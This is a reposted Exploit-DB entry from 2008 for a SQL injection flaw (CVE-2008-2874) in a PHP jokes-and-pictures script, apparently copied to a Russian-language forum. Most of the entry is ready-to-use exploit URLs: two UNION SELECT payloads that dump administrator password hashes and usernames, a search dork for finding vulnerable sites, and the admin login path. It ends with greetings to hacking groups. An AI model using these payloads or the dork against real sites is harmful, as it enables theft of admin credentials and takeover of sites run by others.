- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5934
- Проверка EDB
-
- Пройдено
- Автор
- HUSSIN X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2874
- Дата публикации
- 2008-06-25
Код:
#########################################################
#
# Jokes & Funny Pics Script SQL Injection Vulnerability
#========================================================
#
# Author: Hussin X
#
# Home : www.tryag.cc/cc
#
# email: darkangel_g85[at]Yahoo[DoT]com
# hussin.x[at]hotmail[DoT]com
#
#========================================================
# HomE script : http://www.softbizscripts.com
#
# Demo : http://www.softbizscripts.com/scripts/jokes
#
# DorK : "index.php?sbjoke_id="
##########################################################
Exploit:
http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
Exploit: 2
index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--
Login :
/admin/
################################################################################
####################################( Greetz )##################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #
# Silic0n / Rafi / FAHD / Iraqihack #
# #
#################################(and All IRAQIs)###############################
# milw0rm.com [2008-06-25]
- Источник
- www.exploit-db.com